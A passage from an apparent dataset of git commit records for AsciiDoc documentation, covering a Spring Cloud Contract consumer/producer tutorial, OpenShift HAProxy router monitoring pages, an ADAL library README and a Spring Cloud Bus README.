some\ndifferent ranges of values. To enable ranges of values, you can set regular expressions\nmatching those values for the consumer side. You can provide the body by means of either\na map notation or String with interpolations.\nhttps:\/\/cloud.spring.io\/spring-cloud-contract\/single\/spring-cloud-contract.html#_contract_dsl[Consult the docs\nfor more information.] We highly recommend using the map notation!\n\nTIP: You must understand the map notation in order to set up contracts. Please read the\nhttp:\/\/groovy-lang.org\/json.html[Groovy docs regarding JSON].\n\nThe previously shown contract is an agreement between two sides that:\n\n- if an HTTP request is sent with all of\n** a `PUT` method on the `\/fraudcheck` endpoint,\n** a JSON body with a `client.id` that matches the regular expression `[0-9]{10}` and\n`loanAmount` equal to `99999`,\n** and a `Content-Type` header with a value of `application\/vnd.fraud.v1+json`,\n- then an HTTP response is sent to the consumer that\n** has status `200`,\n** contains a JSON body with the `fraudCheckStatus` field containing a value `FRAUD` and\nthe `rejectionReason` field having value `Amount too high`,\n** and a `Content-Type` header with a value of `application\/vnd.fraud.v1+json`.\n\nOnce you are ready to check the API in practice in the integration tests, you need to\ninstall the stubs locally.\n\n*Add the Spring Cloud Contract Verifier plugin.*\n\nWe can add either a Maven or a Gradle plugin. 
In this example, you see how to add Maven.\nFirst, add the `Spring Cloud Contract` BOM.\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_bom,indent=0]\n----\n\nNext, add the `Spring Cloud Contract Verifier` Maven plugin\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_maven_plugin,indent=0]\n----\n\nSince the plugin was added, you get the `Spring Cloud Contract Verifier` features which,\nfrom the provided contracts:\n\n- generate and run tests\n- produce and install stubs\n\nYou do not want to generate tests since you, as the consumer, want only to play with the\nstubs. You need to skip the test generation and execution. When you execute:\n\n[source,bash,indent=0]\n----\n$ cd local-http-server-repo\n$ .\/mvnw clean install -DskipTests\n----\n\nIn the logs, you see something like this:\n\n[source,bash,indent=0]\n----\n[INFO] --- spring-cloud-contract-maven-plugin:1.0.0.BUILD-SNAPSHOT:generateStubs (default-generateStubs) @ http-server ---\n[INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar\n[INFO]\n[INFO] --- maven-jar-plugin:2.6:jar (default-jar) @ http-server ---\n[INFO] Building jar: \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar\n[INFO]\n[INFO] --- spring-boot-maven-plugin:1.5.5.BUILD-SNAPSHOT:repackage (default) @ http-server ---\n[INFO]\n[INFO] --- maven-install-plugin:2.5.2:install (default-install) @ http-server ---\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.jar\n[INFO] Installing \/some\/path\/http-server\/pom.xml to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT.pom\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nThe following line is extremely important:\n\n[source,bash,indent=0]\n----\n[INFO] Installing \/some\/path\/http-server\/target\/http-server-0.0.1-SNAPSHOT-stubs.jar to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n----\n\nIt confirms that the stubs of the `http-server` have been installed in the local\nrepository.\n\n*Run the integration tests.*\n\nIn order to profit from the Spring Cloud Contract Stub Runner functionality of automatic\nstub downloading, you must do the following in your consumer side project (`Loan\nApplication service`):\n\nAdd the `Spring Cloud Contract` BOM:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=contract_bom,indent=0]\n----\n\nAdd the dependency to `Spring Cloud Contract Stub Runner`:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nAnnotate your test class with `@AutoConfigureStubRunner`. In the annotation, provide the\n`group-id` and `artifact-id` for the Stub Runner to download the stubs of your\ncollaborators. 
(Optional step) Because you're playing with the collaborators offline, you\ncan also provide the offline work switch (`StubRunnerProperties.StubsMode.LOCAL`).\n\n[source,groovy,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/src\/test\/java\/com\/example\/loan\/LoanApplicationServiceTests.java[tags=autoconfigure_stubrunner,indent=0]\n----\n\nNow, when you run your tests, you see something like this:\n\n[source,bash,indent=0]\n----\n2016-07-19 14:22:25.403 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Desired version is + - will try to resolve the latest version\n2016-07-19 14:22:25.438 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved version is 0.0.1-SNAPSHOT\n2016-07-19 14:22:25.439 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolving artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT using remote repositories []\n2016-07-19 14:22:25.451 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Resolved artifact com.example:http-server:jar:stubs:0.0.1-SNAPSHOT to \/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar\n2016-07-19 14:22:25.465 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacking stub from JAR [URI: file:\/path\/to\/your\/.m2\/repository\/com\/example\/http-server\/0.0.1-SNAPSHOT\/http-server-0.0.1-SNAPSHOT-stubs.jar]\n2016-07-19 14:22:25.475 INFO 41050 --- [ main] o.s.c.c.stubrunner.AetherStubDownloader : Unpacked file to [\/var\/folders\/0p\/xwq47sq106x1_g3dtv6qfm940000gq\/T\/contracts100276532569594265]\n2016-07-19 14:22:27.737 INFO 41050 --- [ main] o.s.c.c.stubrunner.StubRunnerExecutor : All stubs are now running RunningStubs [namesAndPorts={com.example:http-server:0.0.1-SNAPSHOT:stubs=8080}]\n----\n\nThis output means that Stub Runner has found your stubs and started a server for your app\nwith group id `com.example`, artifact id `http-server` with version `0.0.1-SNAPSHOT` of\nthe stubs and with `stubs` classifier on port `8080`.\n\n*File a pull request.*\n\nWhat you have done until now is an iterative process. You can play around with the\ncontract, install it locally, and work on the consumer side until the contract works as\nyou wish.\n\nOnce you are satisfied with the results and the test passes, publish a pull request to\nthe server side. 
Currently, the consumer side work is done.\n\n==== Producer side (Fraud Detection server)\n\nAs a developer of the Fraud Detection server (a server to the Loan Issuance service):\n\n*Create an initial implementation.*\n\nAs a reminder, you can see the initial implementation here:\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=server_api,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=initial_impl,indent=0]\n}\n----\n\n*Take over the pull request.*\n\n[source,bash,indent=0]\n----\n$ git checkout -b contract-change-pr master\n$ git pull https:\/\/your-git-server.com\/server-side-fork.git contract-change-pr\n----\n\nYou must add the dependencies needed by the autogenerated tests:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\nIn the configuration of the Maven plugin, pass the `packageWithBaseClasses` property\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=contract_maven_plugin,indent=0]\n----\n\nIMPORTANT: This example uses \"convention based\" naming by setting the\n`packageWithBaseClasses` property. Doing so means that the two last packages combine to\nmake the name of the base test class. In our case, the contracts were placed under\n`src\/test\/resources\/contracts\/fraud`. Since you do not have two packages starting from\nthe `contracts` folder, pick only one, which should be `fraud`. Add the `Base` suffix and\ncapitalize `fraud`. That gives you the `FraudBase` test class name.\n\nAll the generated tests extend that class. Over there, you can set up your Spring Context\nor whatever is necessary. In this case, use http:\/\/rest-assured.io\/[Rest Assured MVC] to\nstart the server side `FraudDetectionController`.\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/test\/java\/com\/example\/fraud\/FraudBase.java[]\n----\n\nNow, if you run the `.\/mvnw clean install`, you get something like this:\n\n[source,bash,indent=0]\n----\nResults :\n\nTests in error:\n ContractVerifierTest.validate_shouldMarkClientAsFraud:32 \u00bb IllegalState Parsed...\n----\n\nThis error occurs because you have a new contract from which a test was generated and it\nfailed since you have not implemented the feature. 
The auto-generated test would look\nlike this:\n\n[source,java,indent=0]\n----\n@Test\npublic void validate_shouldMarkClientAsFraud() throws Exception {\n \/\/ given:\n MockMvcRequestSpecification request = given()\n .header(\"Content-Type\", \"application\/vnd.fraud.v1+json\")\n .body(\"{\\\"client.id\\\":\\\"1234567890\\\",\\\"loanAmount\\\":99999}\");\n\n \/\/ when:\n ResponseOptions response = given().spec(request)\n .put(\"\/fraudcheck\");\n\n \/\/ then:\n assertThat(response.statusCode()).isEqualTo(200);\n assertThat(response.header(\"Content-Type\")).matches(\"application\/vnd.fraud.v1.json.*\");\n \/\/ and:\n DocumentContext parsedJson = JsonPath.parse(response.getBody().asString());\n assertThatJson(parsedJson).field(\"['fraudCheckStatus']\").matches(\"[A-Z]{5}\");\n assertThatJson(parsedJson).field(\"['rejection.reason']\").isEqualTo(\"Amount too high\");\n}\n----\n\nIf you used the Groovy DSL, you can see, all the `producer()` parts of the Contract that were present in the\n`value(consumer(...), producer(...))` blocks got injected into the test.\nIn case of using YAML, the same applied for the `matchers` sections of the `response`.\n\nNote that, on the producer side, you are also doing TDD. The expectations are expressed\nin the form of a test. This test sends a request to our own application with the URL,\nheaders, and body defined in the contract. It also is expecting precisely defined values\nin the response. In other words, you have the `red` part of `red`, `green`, and\n`refactor`. It is time to convert the `red` into the `green`.\n\n*Write the missing implementation.*\n\nBecause you know the expected input and expected output, you can write the missing\nimplementation:\n\n[source,java,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=server_api,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=new_impl,indent=0]\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/src\/main\/java\/com\/example\/fraud\/FraudDetectionController.java[tags=initial_impl,indent=0]\n}\n----\n\nWhen you execute `.\/mvnw clean install` again, the tests pass. Since the `Spring Cloud\nContract Verifier` plugin adds the tests to the `generated-test-sources`, you can\nactually run those tests from your IDE.\n\n*Deploy your app.*\n\nOnce you finish your work, you can deploy your change. First, merge the branch:\n\n[source,bash,indent=0]\n----\n$ git checkout master\n$ git merge --no-ff contract-change-pr\n$ git push origin master\n----\n\nYour CI might run something like `.\/mvnw clean deploy`, which would publish both the\napplication and the stub artifacts.\n\n==== Consumer Side (Loan Issuance) Final Step\n\nAs a developer of the Loan Issuance service (a consumer of the Fraud Detection server):\n\n*Merge branch to master.*\n\n[source,bash,indent=0]\n----\n$ git checkout master\n$ git merge --no-ff contract-change-pr\n----\n\n*Work online.*\n\nNow you can disable the offline work for Spring Cloud Contract Stub Runner and indicate\nwhere the repository with your stubs is located. At this moment the stubs of the server\nside are automatically downloaded from Nexus\/Artifactory. You can set the value of\n`stubsMode` to `REMOTE`. 
The following code shows an example of\nachieving the same thing by changing the properties.\n\n[source,yaml,indent=0]\n----\ninclude::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/samples\/standalone\/dsl\/http-client\/src\/test\/resources\/application-test-repo.yaml[]\n----\n\nThat's it!\n\n=== Dependencies\n\nThe best way to add dependencies is to use the proper `starter` dependency.\n\nFor `stub-runner`, use `spring-cloud-starter-stub-runner`. When you use a plugin, add\n`spring-cloud-starter-contract-verifier`.\n\n=== Additional Links\n\nHere are some resources related to Spring Cloud Contract Verifier and Stub Runner. Note\nthat some may be outdated, because the Spring Cloud Contract Verifier project is under\nconstant development.\n\n==== Spring Cloud Contract video\n\nYou can check out the video from the Warsaw JUG about Spring Cloud Contract:\n\nvideo::sAAklvxmPmk[youtube,start=538,width=640,height=480]\n\n==== Readings\n\n- http:\/\/www.slideshare.net\/MarcinGrzejszczak\/stick-to-the-rules-consumer-driven-contracts-201507-confitura[Slides from Marcin Grzejszczak's talk about Accurest]\n- http:\/\/toomuchcoding.com\/blog\/categories\/accurest\/[Accurest related articles from Marcin Grzejszczak's blog]\n- http:\/\/toomuchcoding.com\/blog\/categories\/spring-cloud-contract\/[Spring Cloud Contract related articles from Marcin Grzejszczak's blog]\n- http:\/\/groovy-lang.org\/json.html[Groovy docs regarding JSON]\n\n=== Samples\n\nYou can find some samples at\nhttps:\/\/github.com\/spring-cloud-samples\/spring-cloud-contract-samples[samples].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab29f0c27edee80268d6617f3748ed827535101d","subject":"Cleanup example to get haproxy statistics via oc exec.","message":"Cleanup example to get haproxy statistics via oc exec.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/router.adoc","new_file":"admin_guide\/router.adoc","new_contents":"= Monitoring Routers\n{product-author}\n{product-version]\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nDepending on the underlying implementation, you can monitor a running\nlink:..\/architecture\/core_concepts\/routes.html[router] in multiple ways. This\ntopic discusses the HAProxy template router and the components to check to\nensure its health.\n\n== Viewing Statistics\nThe HAProxy router exposes a web listener for the HAProxy statistics. Enter the\nrouter's public IP address and the correctly configured port (*1936* by default)\nto view the statistics page, and enter the administrator password when prompted.\nThis password and port are configured during the router installation, but they\ncan be found by viewing the *_haproxy.conf_* file on the container.\n\n== Disabling Statistics View\nBy default the HAProxy statistics are exposed on port *1936* (with a\npassword protected account). 
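Before turning the listener off, you may want to verify what it serves; assuming the default stats URI and the administrator credentials configured at installation (the host and password below are placeholders), a quick check could be:\n\n====\n----\n$ curl -u admin:password http:\/\/router.example.com:1936\/\n----\n====\n\n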
To disable exposing the HAProxy statistics,\nspecify *0* as the stats port number.\n\nifdef::openshift-enterprise[]\n====\n----\n$ oadm router hap --service-account=router --stats-port=0 \\\n --credentials='\/etc\/openshift\/master\/openshift-router.kubeconfig'\n----\n====\nendif::[]\nifdef::openshift-origin[]\n====\n----\n$ oadm router hap --service-account=router --stats-port=0 \\\n --credentials=\"$KUBECONFIG\"\n----\n====\nendif::[]\n\n\nNote: HAProxy will still collect and store statistics, it would just _not_\n expose them via a web listener. You can still get access to the\n statistics by sending a request to the HAProxy AF_UNIX socket inside\n the HAProxy Router container.\n\n====\n----\n$ cmd=\"echo 'show stat' | socat - UNIX-CONNECT:\/var\/lib\/haproxy\/run\/haproxy.sock\"\n$ routerPod=$(oc get pods --selector=\"router=router\" \\\n --template=\"{{with index .items 0}}{{.metadata.name}}{{end}}\")\n$ oc exec $routerPod -- bash -c \"$cmd\"\n----\n====\n\n== Viewing Logs\nTo view a router log, run the `oc log` command on the pod. Since the router is\nrunning as a plug-in process that manages the underlying implementation, the log\nis for the plug-in, not the actual HAProxy log.\n\n== Viewing the Router Internals\n*routes.json*\n\nRoutes are processed by the HAProxy router, and are stored both in memory, on\ndisk, and in the HAProxy configuration file. The internal route representation,\nwhich is passed to the template to generate the HAProxy configuration file, is\nfound in the *_\/var\/lib\/containers\/router\/routes.json_* file. When\ntroubleshooting a routing issue, view this file to see the data being used to\ndrive configuration.\n\n*HAProxy configuration*\n\nYou can find the HAProxy configuration and the backends that have been created\nfor specific routes in the *_\/var\/lib\/haproxy\/conf\/haproxy.conf_* file. The\nmapping files are found in the same directory. The helper frontend and\nbackends use mapping files when mapping incoming requests to a backend.\n\n*Certificates*\n\nCertificates are stored in two places:\n\n- Certificates for edge terminated and re-encrypt terminated routes are stored\nin the *_\/var\/lib\/containers\/router\/certs_* directory.\n- Certificates that are used for connecting to backends for re-encrypt\nterminated routes are stored in the *_\/var\/lib\/containers\/router\/cacerts_*\ndirectory.\n\nThe files are keyed by the namespace and name of the route. The key,\ncertificate, and CA certificate are concatenated into a single file. You can use\nlink:https:\/\/www.openssl.org\/[OpenSSL] to view the contents of these files.\n","old_contents":"= Monitoring Routers\n{product-author}\n{product-version]\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nDepending on the underlying implementation, you can monitor a running\nlink:..\/architecture\/core_concepts\/routes.html[router] in multiple ways. This\ntopic discusses the HAProxy template router and the components to check to\nensure its health.\n\n== Viewing Statistics\nThe HAProxy router exposes a web listener for the HAProxy statistics. 
Enter the\nrouter's public IP address and the correctly configured port (*1936* by default)\nto view the statistics page, and enter the administrator password when prompted.\nThis password and port are configured during the router installation, but they\ncan be found by viewing the *_haproxy.conf_* file on the container.\n\n== Disabling Statistics View\nBy default the HAProxy statistics are exposed on port *1936* (with a\npassword protected account). To disable exposing the HAProxy statistics,\nspecify *0* as the stats port number.\n\nifdef::openshift-enterprise[]\n====\n----\n$ oadm router hap --service-account=router --stats-port=0 \\\n --credentials='\/etc\/openshift\/master\/openshift-router.kubeconfig'\n----\n====\nendif::[]\nifdef::openshift-origin[]\n====\n----\n$ oadm router hap --service-account=router --stats-port=0 \\\n --credentials=\"$KUBECONFIG\"\n----\n====\nendif::[]\n\n\nNote: HAProxy will still collect and store statistics, it would just _not_\n expose them via a web listener. You can still get access to the\n statistics by sending a request to the HAProxy AF_UNIX socket inside\n the HAProxy Router container.\n\n====\n----\n$ cmd=\"echo 'show stat' | socat - UNIX-CONNECT:\/var\/lib\/haproxy\/run\/haproxy.sock\"\n$ oc exec $(oc get pods --selector=\"router=router\" \\\n --template=\"{{with index .items 0}}{{.metadata.name}}{{end}}\") -- \\\n bash -c \"$cmd\"\n----\n====\n\n== Viewing Logs\nTo view a router log, run the `oc log` command on the pod. Since the router is\nrunning as a plug-in process that manages the underlying implementation, the log\nis for the plug-in, not the actual HAProxy log.\n\n== Viewing the Router Internals\n*routes.json*\n\nRoutes are processed by the HAProxy router, and are stored both in memory, on\ndisk, and in the HAProxy configuration file. The internal route representation,\nwhich is passed to the template to generate the HAProxy configuration file, is\nfound in the *_\/var\/lib\/containers\/router\/routes.json_* file. When\ntroubleshooting a routing issue, view this file to see the data being used to\ndrive configuration.\n\n*HAProxy configuration*\n\nYou can find the HAProxy configuration and the backends that have been created\nfor specific routes in the *_\/var\/lib\/haproxy\/conf\/haproxy.conf_* file. The\nmapping files are found in the same directory. The helper frontend and\nbackends use mapping files when mapping incoming requests to a backend.\n\n*Certificates*\n\nCertificates are stored in two places:\n\n- Certificates for edge terminated and re-encrypt terminated routes are stored\nin the *_\/var\/lib\/containers\/router\/certs_* directory.\n- Certificates that are used for connecting to backends for re-encrypt\nterminated routes are stored in the *_\/var\/lib\/containers\/router\/cacerts_*\ndirectory.\n\nThe files are keyed by the namespace and name of the route. The key,\ncertificate, and CA certificate are concatenated into a single file. 
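As a sketch, one of these concatenated files could be inspected like this — the route file name below is invented purely for illustration:\n\n====\n----\n$ openssl x509 -in \/var\/lib\/containers\/router\/certs\/myproject:myroute.pem -text -noout\n----\n====\n\n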
You can use\nlink:https:\/\/www.openssl.org\/[OpenSSL] to view the contents of these files.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4fd311124f3e7a993d93ad637a499188ec1d4cea","subject":"edits after peer review","message":"edits after peer review\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"admin_guide\/router.adoc","new_file":"admin_guide\/router.adoc","new_contents":"= Routers\n{product-author}\n{product-version]\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nDepending on the underlying implementation, you can monitor a running\nlink:..\/architecture\/core_objects\/routing.html[router] in multiple ways. This\ntopic discusses the HAProxy template router, and the components to check to\nensure its health.\n\n== Viewing Statistics\nThe HAProxy router exposes a web listener for the HAProxy statistics. Enter the\nrouter's public IP address and the correctly configured port (1936 by default)\nto view the statistics page, and enter the admin password when prompted. This\npassword and port were configured during the router installation, but can be\nfound by viewing the *_haproxy.conf_* file on the container.\n\n== Viewing Logs\nTo view a router log, run the `oc log` command on the pod. Since the router is\nrunning as a plug-in process that manages the underlying implementation, the log\nis for the plug-in, not the actual HAProxy log.\n\n== Router Internals\n.Routes.json\n\nRoutes are processed by the HAProxy router, and are stored both in memory, on\ndisk, and in the HAProxy configuration file. The internal route representation,\nwhich is passed to the template to generate the HAProxy configuration file, is\nfound in the *_\/var\/lib\/containers\/router\/routes.json_* file. When\ntroubleshooting a routing issue, view this file to see the data being used to\ndrive configuration.\n\n.HAProxy Config\n\nYou can find the HAProxy configuration and the back-ends that have been created\nfor specific routes in the *_\/var\/lib\/haproxy\/conf\/haproxy.conf_* file. The\nmapping files are found in the same directory. The helper front-end and\nback-ends use mapping files when mapping incoming requests to a back-end.\n\n.Certificates\n\nCertificates are stored in two places. Certificates for edge terminated and\nre-encrypt terminated routes are stored in the\n*_\/var\/lib\/containers\/router\/certs_* directory. Certificates that are used for\nconnecting to back-ends for re-encrypt terminated routes are stored in the\n*_\/var\/lib\/containers\/router\/cacerts_* directory. The files are keyed by the\nnamespace and name of the route. The key, certificate, and CA certificate are\nconcatenated into a single file. You can use\nlink:https:\/\/www.openssl.org\/[OpenSSL] to view the contents of these files.\n","old_contents":"= Routers\n{product-author}\n{product-version]\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n\ntoc::[]\n\n== Overview\nOnce you have a running link:..\/architecture\/core_objects\/routing.html[Router] you are ready\nto monitor it. Depending on the underlying router implementation this may be accomplished\nmultiple ways. This document will discuss the HAProxy template router and the different\ncomponents that can be checked to ensure its health.\n\n== Viewing Statistics\nThe HAProxy router exposes a web listener for the HAProxy statistics. 
You can enter the public\nIP address of the router with the correctly configured port to view the statistics page. You \nwill be prompted for the admin password. This password and port were configured during the\nrouter installation.\n\n== Viewing Logs\nTo view a router log, simply run the `oc log` command for the pod. Keep in mind that since\nthe router is running as a plugin process that manages the underlying implementation the log\nthat you will see is the log for the plugin, not the actual HAProxy log. \n\n== Router Internals\n.Routes.json\n\nAs routes are processed by the HAProxy router they are stored both in memory, on disk, and in\nthe HAProxy configuration file. In `\/var\/lib\/containers\/router\/routes.json` you can find the\ninternal representation of the routes that is passed to the template to generate the HAProxy\nconfiguration file. When troubleshooting a route issue it may help to look at this file to\nsee the data that is being used to drive configuration.\n\n.HAProxy Config\n\nIn `\/var\/lib\/haproxy\/conf\/haproxy.conf` you can find the configuration that is being used\nby HAProxy. Here is where you can view the backends that have been created for specific routes.\nAlso, in the same directory you can find the mapping files that are used by the helper \nfrontend and backends when mapping an incoming request to a backend.\n\n.Certificates\n\nCertificates are stored in two places. Certificates that are presented at the edge for edge\nterminated and re-encrypt terminated routes are stored in `\/var\/lib\/containers\/router\/certs\/`.\nCertificates that are used when connecting to backends for re-encrypt terminated routes are\nstored in `\/var\/lib\/containers\/router\/cacerts\/`. The files are keyed by the namespace and\nname of the route. You will find that the key, certificate, and CA certificate are \nconcatenated into a single file. 
You may use openssl to view the contents of these files.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d62473d599ba9753eadb66dc13d00ffd1c5e783","subject":"Add readme reference to license.","message":"Add readme reference to license.\n","repos":"massivedisaster\/ADAL","old_file":"README.adoc","new_file":"README.adoc","new_contents":":libVersion: 0.1.7\n\n# ADAL\n\nimage:https:\/\/api.bintray.com\/packages\/jmspt\/maven\/adal\/images\/download.svg[Build Status,link=https:\/\/bintray.com\/jmspt\/maven\/adal\/_latestVersion]\n\nAndroid Development Acceleration Library\n\nAdd the dependency in the form:\n[source, groovy, subs='attributes']\ndependencies {\n \/* Include all modules *\/\n compile 'com.massivedisaster.adal:adal:{libVersion}'\n \/* Specific modules*\/\n compile 'com.massivedisaster.adal:adal-accounts:{libVersion}'\n compile 'com.massivedisaster.adal:adal-adapters:{libVersion}'\n compile 'com.massivedisaster.adal:adal-analytics:{libVersion}'\n compile 'com.massivedisaster.adal:adal-bus:{libVersion}'\n compile 'com.massivedisaster.adal:adal-fragments:{libVersion}'\n compile 'com.massivedisaster.adal:adal-managers:{libVersion}'\n compile 'com.massivedisaster.adal:adal-network:{libVersion}'\n compile 'com.massivedisaster.adal:adal-utils:{libVersion}'\n compile 'com.massivedisaster.adal:adal-location:{libVersion}'\n}\n\n### License\nlink:LICENSE.md[GNU LESSER GENERAL PUBLIC LICENSE] \n","old_contents":":libVersion: 0.1.7\n\n# ADAL\n\nimage:https:\/\/api.bintray.com\/packages\/jmspt\/maven\/adal\/images\/download.svg[Build Status,link=https:\/\/bintray.com\/jmspt\/maven\/adal\/_latestVersion]\n\nAndroid Development Accelaration Library\n\nAdd the dependency in the form:\n[source, groovy, subs='attributes']\ndependencies {\n \/* Include all modules *\/\n compile 'com.massivedisaster.adal:adal:{libVersion}'\n \/* Specific modules*\/\n compile 'com.massivedisaster.adal:adal-accounts:{libVersion}'\n compile 'com.massivedisaster.adal:adal-adapters:{libVersion}'\n compile 'com.massivedisaster.adal:adal-analytics:{libVersion}'\n compile 'com.massivedisaster.adal:adal-bus:{libVersion}'\n compile 'com.massivedisaster.adal:adal-fragments:{libVersion}'\n compile 'com.massivedisaster.adal:adal-managers:{libVersion}'\n compile 'com.massivedisaster.adal:adal-network:{libVersion}'\n compile 'com.massivedisaster.adal:adal-utils:{libVersion}'\n compile 'com.massivedisaster.adal:adal-location:{libVersion}'\n}\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8a5007bb8e9981b4f78771c893d0a153a776f900","subject":"Update README","message":"Update README\n","repos":"spring-cloud\/spring-cloud-bus,spring-cloud\/spring-cloud-bus","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/ Do not edit this file (e.g. go instead to src\/main\/asciidoc)\n\n= Spring Cloud Bus\n\nSpring Cloud Bus links nodes of a distributed system with a lightweight message broker. This can then be used to broadcast state changes (e.g. configuration changes) or other management instructions. A key idea is that the Bus is like a distributed Actuator for a Spring Boot application that is scaled out, but it can also be used as a communication channel between apps. The only implementation currently is with an AMQP broker as the transport, but the same basic feature set (and some more depending on the transport) is on the roadmap for other transports.\n\n\n== Quick Start\n\nSpring Cloud Bus works by adding Spring Boot autoconfiguration if it detects itself on the classpath. All you need to do to enable the bus is to add `spring-cloud-starter-bus-amqp` or `spring-cloud-starter-bus-kafka` to your dependency management and Spring Cloud takes care of the rest. Make sure the broker (RabbitMQ or Kafka) is available and configured: running on localhost you shouldn't have to do anything, but if you are running remotely use Spring Cloud Connectors, or Spring Boot conventions to define the broker credentials, e.g. for Rabbit\n\n.application.yml\n----\nspring:\n rabbitmq:\n host: mybroker.com\n port: 5672\n username: user\n password: secret\n----\n\nThe bus currently supports sending messages to all nodes listening or all nodes for a particular service (as defined by Eureka). More selector criteria may be added in the future (i.e. only service X nodes in data center Y, etc...). There are also some HTTP endpoints under the `\/bus\/*` actuator namespace. There are currently two implemented. The first, `\/bus\/env`, sends key\/value pairs to update each node's Spring Environment. The second, `\/bus\/refresh`, will reload each application's configuration, just as if they had all been pinged on their `\/refresh` endpoint.\n\nNOTE: the Bus starters cover Rabbit and Kafka, because those are the two most common implementations, but Spring Cloud Stream is quite flexible and binder will work combined with `spring-cloud-bus`.\n\n
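Once an application with the bus on its classpath is running, you can exercise these endpoints from a terminal. A sketch — the host and port are just examples, and the endpoint is assumed to take a POST:\n\n----\n$ curl -X POST http:\/\/localhost:8080\/bus\/refresh\n----\n\nEvery instance listening on the bus should then refresh itself, not just the one you addressed.\n\n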
== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttp:\/\/compose.docker.io\/[Docker Compose] to run the middleware servers\nin Docker containers. 
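If all you need locally is RabbitMQ, a single container is often enough. A minimal sketch (the image tag and container name here are assumptions, not taken from the samples):\n\n----\n$ docker run -d --name bus-rabbit -p 5672:5672 rabbitmq:3\n----\n\n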
